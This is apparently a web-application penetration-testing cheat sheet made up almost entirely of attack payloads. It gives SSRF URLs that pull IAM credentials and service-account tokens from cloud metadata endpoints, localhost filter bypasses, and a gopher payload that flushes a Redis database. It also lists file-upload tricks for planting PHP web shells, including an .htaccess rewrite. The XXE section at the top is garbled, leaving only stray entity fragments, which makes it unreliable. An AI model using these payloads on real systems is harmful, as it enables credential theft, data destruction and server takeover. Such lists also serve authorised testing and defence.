Web application penetration testing — SQL injection, XSS, SSRF, deserialization.
Official Page
]>
&xxe;
]>
%xxe;
]>
">
%eval;%exfil;
# Cloud metadata
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# 127.0.0.1 bypasses
http://0/ http://0.0.0.0/ http://127.1/
http://[::] http://[::1]/
http://①②⑦.①/ (Unicode)
http://0x7f000001/ http://2130706433/
http://127.127.127.127/
# Gopher for Redis
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A
# SSRF to internal scan
http://internal.corp/admin
http://localhost:8080/actuator/env
# Extension bypass
.php → .php5 .phtml .phar .php7 .shtml .pwml
# Double extension: shell.jpg.php
# Null byte: shell.php%00.jpg
# MIME bypass (in Burp, change Content-Type:)
image/jpeg, image/png, image/gif
# Magic bytes (prepend to file)
JPEG: \xFF\xD8\xFF
PNG: \x89PNG\r\n\x1a\n
GIF: GIF89a
# .htaccess upload to enable PHP
echo "AddType application/x-httpd-php .jpg" > .htaccess
# Upload then shell.jpg
interactsh-client or Burp Collaborator to detect out-of-band DNS/HTTP callbacks.